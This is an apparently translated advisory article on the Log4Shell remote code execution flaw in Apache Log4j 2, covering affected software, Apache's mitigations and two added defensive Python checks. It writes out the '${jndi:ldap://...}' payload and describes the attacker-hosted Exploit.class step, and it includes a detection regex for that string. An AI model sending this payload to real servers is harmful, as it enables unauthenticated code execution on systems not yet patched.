Log4Shell, a critical vulnerability in Apache Log4j 2 that affects many Java projects

News recently broke that a critical vulnerability has been identified in Apache Log4j 2, a popular framework for organising logging in Java applications, which allows arbitrary code to be executed when a specially formatted value of the form "${jndi:URL}" is written to the log.

The vulnerability is notable because the attack can be carried out against Java applications that log values obtained from external sources, for example by reproducing problematic values in error messages.

It is noted that almost all projects using frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The vulnerability is expected to lead to a wave of massive attacks on enterprise applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which by a rough estimate is used in 65% of the web applications of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been recorded.

The vulnerability allows unauthenticated remote code execution. Log4j 2 is an open-source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. This includes enterprise applications as well as numerous cloud services.

The Randori attack team has developed a working exploit and has been able to successfully use this vulnerability in customer environments as part of our offensive security platform.

The vulnerability can be reached through a multitude of application-specific paths. In effect, any scenario in which a remote connection can supply arbitrary data that an application using the Log4j library writes to its log files is susceptible to exploitation. This vulnerability is very likely to be exploited in the wild and could affect thousands of organisations. It represents a significant real risk to affected systems.

The problem is compounded by the fact that a working exploit has already been published, but fixes for the stable branches have not yet been released. A CVE identifier has not yet been assigned. The fix is included only in the log4j-2.15.0-rc1 test branch. As a workaround to block the vulnerability, it is recommended to set the parameter log4j2.formatMsgNoLookups to true.

The problem stems from the fact that Log4j 2 supports the processing of special "${}" masks in log lines, within which JNDI (Java Naming and Directory Interface) queries can be executed.

In its analysis of CVE-2021-44228, Randori determined the following:

  • Default installations of widely used enterprise software are vulnerable.
  • The vulnerability can be exploited reliably and without authentication.
  • The vulnerability affects multiple versions of Log4j 2.
  • The vulnerability allows remote code execution as the user running the application that uses the library.

The attack boils down to passing a string containing the substitution "${jndi:ldap://example.com/a}"; when processing it, Log4j 2 sends an LDAP request for the path to a Java class on the attacker's server (attacker.com). The path returned by the attacker's server (for example, http://example.com/Exploit.class) is then loaded and executed in the context of the current process, allowing the attacker to achieve arbitrary code execution on the system with the privileges of the current application.
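A first triage check for the log side of this, as an added example that is not from the original article, Randori or LunaSec: it scans constructed sample log lines for the "${jndi:...}" lookup string described above and reports the scheme and host each one points at, so a defender can tell which records need follow-up.

```python
import re

# Matches the ${jndi:<scheme>:<target>} lookup described above; the closing brace
# is optional because a truncated log field may cut it off.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):(?P<target>[^}\s]*)\}?", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return one finding per JNDI lookup string found in the given log lines."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            target = m.group("target")
            host = target.lstrip("/").split("/", 1)[0]  # host[:port] part of the URL
            findings.append({"line": lineno, "scheme": m.group("scheme").lower(),
                             "host": host, "raw": m.group(0)})
    return findings


# Constructed sample access-log lines (not real traffic). Lines 2 and 3 carry the
# lookup string from the article in the User-Agent and request-path fields.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://example.com/a}"',
    '10.0.0.9 - - "GET /${jndi:ldap://example.com/a} HTTP/1.1" 404 "curl/7.79"',
]
```

Run `find_jndi_lookups` over real access or application logs line by line; any hit is a reason to treat the host as a possible active incident, as the article advises.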

Finally, it is noted that if anomalies are detected, it is recommended to assume that this is an active incident, that you have been compromised, and to respond accordingly. Upgrading to the patched versions of Log4j 2 or of the affected applications will eliminate this vulnerability. Randori recommends that any organisation that believes it may be affected upgrade to the patched version as soon as possible.

In its latest update, the Apache Log4j team advises organisations to do the following:

  • Update to Log4j 2.15.0
  • For those who cannot upgrade to 2.15.0: in versions >= 2.10, this vulnerability can be mitigated by setting the log4j2.formatMsgNoLookups system property or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.
  • For versions 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.
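To decide which of the three options above applies to a given deployment, here is an added example (not the Apache team's, Randori's or LunaSec's code) that inspects a log4j-core jar: it reads the version from the Maven pom.properties the jar carries, checks whether the JndiLookup class (org.apache.logging.log4j.core.lookup.JndiLookup) is still present, and maps the result to the advice in the list. It assumes the jar keeps the standard Maven pom.properties path; the sample jar it builds is a constructed stand-in, not a real Log4j build.

```python
import io
import re
import zipfile

# Path of the JNDI lookup class inside log4j-core jars, and the Maven
# pom.properties file that records the artifact version.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple; a pre-release sorts below its final release."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?", text or "")
    if not m:
        return None
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if tag else 1)


def assess_log4j_core(jar_bytes):
    """Report the version, whether JndiLookup.class is present, and the article's advice for that case."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi_lookup = JNDI_LOOKUP_CLASS in names
    parsed = parse_version(version)
    if parsed is not None and parsed >= (2, 15, 0, 1):
        advice = "fixed release (2.15.0 or later), no action needed"
    elif not has_jndi_lookup:
        advice = "JndiLookup class already removed; upgrade to 2.15.0 when possible"
    elif parsed is not None and parsed >= (2, 10, 0, 1):
        advice = "upgrade to 2.15.0; interim: set log4j2.formatMsgNoLookups=true or LOG4J_FORMAT_MSG_NO_LOOKUPS=true"
    else:
        advice = "upgrade to 2.15.0; interim: remove JndiLookup.class from the classpath"
    return {"version": version, "has_jndi_lookup": has_jndi_lookup, "advice": advice}


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar (not a real Log4j build), for trying the check offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()
```

On a real system, pass the bytes of each log4j-core jar found on the classpath to `assess_log4j_core`; jars without pom.properties report `version` as None and fall back to the class check alone.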

Source: https://www.lunasec.io/
